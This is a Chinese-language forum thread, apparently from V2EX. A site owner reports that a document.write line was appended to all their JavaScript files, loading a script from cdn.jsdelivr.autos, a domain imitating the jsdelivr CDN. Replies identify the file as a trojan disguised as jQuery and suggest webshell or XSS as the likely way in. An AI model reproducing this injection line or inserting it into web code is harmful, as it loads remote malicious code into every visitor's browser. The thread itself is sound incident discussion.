document.write(unescape("%3Cscript src='https://cdn.jsdelivr.autos/npm/jquery/dist/jquery.min.js'%3E%3C/script%3E"));
把加载的 js 最后全加了这个。
|  |      1QUC062IzY3M1Y6dg      2022-10-26 12:28:19 +08:00 就是给网页添加了 jquery 库的引入标签,不过这样写的话,整个页面都废了全部被覆盖。 | 
|      3kenvix      2022-10-26 12:39:00 +08:00 打开 https://cdn.jsdelivr.autos/npm/jquery/dist/jquery.min.js 显然这不是正常的 jquery 而是假装 jq 的马 | 
|  |      5illl      2022-10-26 12:47:43 +08:00 via iPhone 被 getshell 了吧,网站用的啥框架 | 
|      6mxT52CRuqR6o5      2022-10-26 12:50:36 +08:00 那可能性可多了 | 
|      8r4aAi04Uk2gYWU89      2022-10-26 15:24:43 +08:00  1 @jalen 如果博客开了评论,检查下 xss 。不过所有页面都有加的话,估计 webshell 早拿到了 | 
|  |      9learningman      2022-10-26 16:06:54 +08:00  1 头一回见到 autos 这个顶级域 | 
|  |      10wingor2015      2022-10-26 16:51:11 +08:00 遇到过一次是服务器上的代码被加了 | 
|  |      11jalen OP 我看了自己的文件 就 js 被修改过,也没有新增文件。服务器也没被闯入的痕迹。 这攻击点会在哪里? | 
|      12hxy100      2022-10-27 02:26:47 +08:00 这个域名也很有迷惑性,仿知名 CDN 的域名 jsdelivr.com | 
|  |      13MEIerer      2022-10-27 09:31:03 +08:00 我好久没中过木马了,现在装东西看见内存小的都会往哈勃测一下 | 
|      15Trient      2022-10-27 13:47:08 +08:00 | 
|      16siwi      2022-11-12 17:35:01 +08:00 找到问题所在了吗?  我也是被挂了这个链接 |